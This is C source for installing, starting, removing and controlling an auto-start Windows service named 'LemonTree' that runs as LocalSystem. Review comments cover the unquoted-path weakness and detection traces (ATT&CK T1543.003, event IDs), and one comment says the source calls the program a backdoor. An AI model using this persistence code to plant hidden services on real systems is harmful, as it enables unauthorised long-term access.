|
代码:
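/**************************************************************************************************
* Globals and forward declarations
*
* The wide-string literals combined with the generic (non-A/W) Win32 names used in this file
* imply a UNICODE build.
**************************************************************************************************/
#define SERVICE_NAME         L"LemonTree"
#define SERVICE_DESCRIPTION  L"LemonTree"
#define SERVICE_DISPLAY_NAME L"LemonTree"

SERVICE_STATUS        serviceStatus;   /* status block that ServiceControl updates and reports */
SERVICE_STATUS_HANDLE hServiceStatus;  /* handle ServiceControl passes to SetServiceStatus */

BOOL ServiceInstall( WCHAR * );  /* install the service */
BOOL ServiceUnstall( WCHAR * );  /* delete the service */
void ServiceControl( DWORD );    /* handle service control requests */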
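BOOL ServiceExists( WCHAR * );  /* check whether the service already exists */

/***********************************************************************************
* Install the service
*
* Registers SERVICE_NAME with the Service Control Manager (SCM) as an auto-start,
* own-process Win32 service, writes its Description value under the service's
* registry key and then tries to start it.
*
* Parameter: exeFilePath - full path of the service executable. It is handed to
*            CreateService unchanged.
* Returns:   TRUE when the service was created and its registry key could be
*            opened (a failed start is only reported), FALSE otherwise.
*
* NOTE(review): the path is not quoted here. A binary path that contains spaces
* and is stored unquoted is resolved ambiguously by the SCM (the "unquoted
* service path" weakness); callers should pass an already-quoted path.
*
* Detection: creating an auto-start service is a well-known persistence
* mechanism (MITRE ATT&CK T1543.003). The creation is logged as System event
* 7045 and, when that audit policy is enabled, Security event 4697, and it
* leaves a key under HKLM\SYSTEM\CurrentControlSet\Services\<service name>.
***********************************************************************************/
BOOL ServiceInstall( WCHAR *exeFilePath )
{
    /* Adjacent wide literals are joined at compile time, so no runtime copy into a
       fixed-size buffer is needed. */
    static const WCHAR serviceKeyPath[] = L"SYSTEM\\CurrentControlSet\\Services\\" SERVICE_NAME;

    SC_HANDLE serviceMangerHandle = NULL;
    SC_HANDLE serviceHandle = NULL;
    HKEY      key = NULL;
    LONG      regResult;
    BOOL      installed = FALSE;

    if ( exeFilePath == NULL )
    {
        return FALSE;
    }

    serviceMangerHandle = OpenSCManager( NULL, NULL, SC_MANAGER_CREATE_SERVICE );
    if ( serviceMangerHandle == NULL )
    {
        printf( "Install: Open services manager database error: %lu\n", GetLastError() );
        return FALSE;
    }

    serviceHandle = CreateService
    (
        serviceMangerHandle,
        SERVICE_NAME,
        SERVICE_DISPLAY_NAME,
        SERVICE_START,              /* the handle is only used for StartService below */
        SERVICE_WIN32_OWN_PROCESS,
        SERVICE_AUTO_START,         /* started by the SCM at every boot */
        SERVICE_ERROR_NORMAL,
        exeFilePath,                /* binary path, passed through as given */
        NULL,
        NULL,
        NULL,
        NULL,                       /* no account name: the service runs as LocalSystem */
        NULL
    );
    if ( serviceHandle == NULL )
    {
        printf( "Create service error: %lu\n", GetLastError() );
        goto cleanup;
    }

    /* Registry functions return the error code directly; GetLastError() is not set by them. */
    regResult = RegOpenKeyEx( HKEY_LOCAL_MACHINE, serviceKeyPath, 0, KEY_SET_VALUE, &key );
    if ( regResult != ERROR_SUCCESS )
    {
        printf( "Open key %ls error: %ld\n", serviceKeyPath, regResult );
        goto cleanup;   /* previously both service handles leaked on this path */
    }

    /* cbData is a byte count and, for REG_SZ, must include the terminating NUL. */
    regResult = RegSetValueEx( key, L"Description", 0, REG_SZ,
                               (const BYTE *)SERVICE_DESCRIPTION, sizeof( SERVICE_DESCRIPTION ) );
    if ( regResult != ERROR_SUCCESS )
    {
        printf( "Set description error: %ld\n", regResult );
    }
    RegCloseKey( key );

    if ( !StartService( serviceHandle, 0, NULL ) )
    {
        printf( "Install service ok, but start it error: %lu\n", GetLastError() );
    }
    else
    {
        printf( "Install service ok, start it ok.\n" );
    }
    installed = TRUE;

cleanup:
    if ( serviceHandle != NULL )
    {
        CloseServiceHandle( serviceHandle );
    }
    CloseServiceHandle( serviceMangerHandle );
    return installed;
}
/**************************************************************************************************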
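* Remove the service
*
* Parameter: serviceName - name of the service to delete
* Returns:   TRUE when DeleteService succeeded; FALSE when the SCM or the service could not be
*            opened or the deletion itself failed.
*
* Only the rights this routine uses are requested (SC_MANAGER_CONNECT and DELETE) instead of
* the *_ALL_ACCESS masks. DeleteService marks the service for deletion; the SCM removes the
* entry once the service has stopped and every open handle to it is closed.
**************************************************************************************************/
BOOL ServiceUnstall( WCHAR *serviceName )
{
    SC_HANDLE scmHandle;
    SC_HANDLE scHandle;
    BOOL      deleted;

    scmHandle = OpenSCManager( NULL, NULL, SC_MANAGER_CONNECT );
    if ( scmHandle == NULL )
    {
        return FALSE;
    }

    scHandle = OpenService( scmHandle, serviceName, DELETE );
    if ( scHandle == NULL )
    {
        CloseServiceHandle( scmHandle );
        return FALSE;
    }

    /* Report the real outcome instead of returning TRUE unconditionally. */
    deleted = DeleteService( scHandle );

    CloseServiceHandle( scHandle );
    CloseServiceHandle( scmHandle );
    return deleted ? TRUE : FALSE;
}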
/**************************************************************************************************
* Service control handler
*
* Maps a control request onto the global serviceStatus block and reports the block to the SCM
* through SetServiceStatus. Interrogate requests and unrecognised codes leave the block
* unchanged; it is reported either way.
*
* Parameter: request - control code (SERVICE_CONTROL_*)
*
* NOTE(review): a stop request only reports SERVICE_STOP_PENDING here; the transition to
* SERVICE_STOPPED is presumably made elsewhere - confirm against the service main routine.
**************************************************************************************************/
void ServiceControl( DWORD request )
{
    SERVICE_STATUS *status = &serviceStatus;

#ifdef DEBUG
    LogToFile( L"ServiceControl: Into ServiceControl\n" );
#endif

    if ( request == SERVICE_CONTROL_PAUSE )
    {
        status->dwCurrentState = SERVICE_PAUSED;
    }
    else if ( request == SERVICE_CONTROL_CONTINUE )
    {
        status->dwCurrentState = SERVICE_RUNNING;
    }
    else if ( request == SERVICE_CONTROL_STOP )
    {
#ifdef DEBUG
        LogToFile( L"ServiceControl: Try to stop service\n" );
#endif
        status->dwWin32ExitCode = 0;
        status->dwCurrentState  = SERVICE_STOP_PENDING;
        status->dwCheckPoint    = 0;
        status->dwWaitHint      = 0;
    }
    else if ( request != SERVICE_CONTROL_INTERROGATE )
    {
        /* Any other code is unexpected; it is only logged in debug builds. */
#ifdef DEBUG
        LogToFile( L"ServiceControl: Error arguments\n" );
#endif
    }

    if ( SetServiceStatus( hServiceStatus, status ) )
    {
        return;
    }

#ifdef DEBUG
    {
        WCHAR message[256] = { 0 };
        wsprintf( message, L"ServiceMain: Control service error: %d\n", GetLastError() );
        LogToFile( message );
    }
#endif
}

BOOL ServiceExists( WCHAR *path )
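{
    /*
     * Reports whether SERVICE_NAME is already registered with `path` as its binary.
     *
     * Reads the ImagePath value under HKLM\SYSTEM\CurrentControlSet\Services\<SERVICE_NAME>
     * and compares it, ignoring case, with `path`.
     *
     * Returns TRUE on a match; FALSE when the key or value cannot be read, the value is not
     * a string, or the strings differ.
     *
     * NOTE(review): this is a plain string comparison. An ImagePath that is quoted, carries
     * arguments or contains unexpanded environment variables will not match the same file.
     */
    static const WCHAR serviceKeyPath[] = L"SYSTEM\\CurrentControlSet\\Services\\" SERVICE_NAME;

    HKEY  key = NULL;
    WCHAR value[512] = { 0 };
    DWORD type = 0;
    /* Registry strings are not guaranteed to be NUL-terminated: keep the last WCHAR of the
       zero-initialised buffer out of reach so `value` always ends in a terminator. */
    DWORD size = sizeof( value ) - sizeof( WCHAR );
    LONG  result;

    if ( path == NULL )
    {
        return FALSE;
    }

    if ( RegOpenKeyEx( HKEY_LOCAL_MACHINE, serviceKeyPath, 0, KEY_QUERY_VALUE, &key ) != ERROR_SUCCESS )
    {
        return FALSE;
    }

    result = RegQueryValueEx( key, L"ImagePath", NULL, &type, (BYTE *)value, &size );
    RegCloseKey( key );   /* closed on every path; it used to leak when the query failed */

    if ( result != ERROR_SUCCESS )
    {
        return FALSE;
    }
    if ( type != REG_SZ && type != REG_EXPAND_SZ )
    {
        return FALSE;
    }

    /* If the registered program path equals the given path (the program itself, which the
       page calls the backdoor), the service counts as already installed. */
    if ( 0 == _wcsicmp( value, path ) )
    {
        return TRUE;
    }
    return FALSE;
}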